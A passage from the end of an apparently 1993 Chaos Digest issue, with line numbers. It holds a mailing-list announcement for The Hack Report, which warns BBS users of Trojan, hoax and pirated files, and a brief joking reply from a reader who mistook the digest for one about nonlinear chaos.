  779.  
  780.                  [hack@alive.ersys.edmonton.ab.ca]
  781.  
  782. The Hack Report is a monthly informational newsletter put out by Lee
  783. Jackson, Co-Moderator of the FidoNet International SHAREWRE echo and
  784. Moderator of the FidoNet WARNINGS echo which warns of hacked, hoax,
  785. Trojan Hourse, and pirated files that have been seen posted on BBS
  786. systems worldwide.  It is mainly MS-DOS oriented, although it does
  787. have a few notes on programs for other computer platforms.  It is a
  788. great aid for anyone who downloads files from a public access system.
  789.  
  790. There are many people who do not get quack, or any, access to the
  791. latest version of the essential report.  This mailing list has been
  792. created to allow fast efficient distribution of The Hack Report to
  793. people with an Internet mail address who do not have easy access to
  794. it via other means such as anonymous FTP or through FidoNet.  This is
  795. a one-directional list soley for the distribution of The Hack Report
  796. each month.
  797.  
  798. To subscribe to The Hack Report mailing list, please send requests to
  799. the human monitored address hackalive.ersys.edmonton.ab.ca.
  800.  
  801. Owner:  Marc Slemko <marcs@alive.ersys.edmonton.ab.ca>
  802. --
  803. Doug Sewell, Tech Support, Computer Center, Youngstown State University
  804. doug@cc.ysu.edu    doug@ysub.bitnet     <internet>!cc.ysu.edu!doug
  805.  
  806. ------------------------------
  807.  
  808. Date: Mon May 31 23:47:20 -0700 1993
  809. From: park@netcom.com (Bill Park )
  810. Subject: File 5--Autre type de chaos (identification)
  811.  
  812. > that present some security aspects: frauds, hacking, swapping,
  813. > legislation, phreaking...
  814.  
  815. Ooops!  Sorry, I though the journal was about the nonlinear dynamic systems
  816. kind of choas.
  817.  
  818. Never mind,
  819. Bill Park
  820. =========
  821.  
  822. ------------------------------
  823.  
  824. End of Chaos Digest #1.44
  825. ************************************
  826.